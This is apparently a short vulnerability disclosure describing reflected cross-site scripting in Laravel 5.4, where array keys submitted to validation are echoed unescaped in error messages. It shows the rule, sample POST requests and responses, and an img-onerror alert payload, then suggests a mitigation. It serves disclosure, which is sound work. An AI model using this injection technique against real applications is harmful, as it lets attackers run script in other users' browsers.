# Exploit Title: Laravel non-presistent XSS in validation of arrays
# Date: 06/03/2017
# Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com)
# Vendor Homepage: laravel.com
# Version: 5.4
In Laravel validation rules, assume that you set a rule to get an array input.
$this->validate($request, [
'lessons' => 'required|array',
'lessons.*' => 'numeric'
]);
Here we say lessons should be array and the elements should be numeric.
Now let's enter a character there to fail the validation.
POST Request: lessons[]=1&lessons[]=4&lessons[]=abc
It tells {"lessons.2":["The lessons.2 must be a number."]}
That's OK up to here. But what if we place an index for the array.
POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc
Response: {"lessons.example":["The lessons.example must be a number."]}
POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x
onerror='alert(1)'>]=abc
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img
src=x onerror='alert(1)'> must be a number."]}
And it executes the alert with no problem...
You can see this bug already exists in Laravel official doc:
https://laravel.com/docs/master/validation#validating-arrays
Maybe the solution is to validate the array values yourself by for
example extending validation rules.
Regards,
MaHDyfo
Iran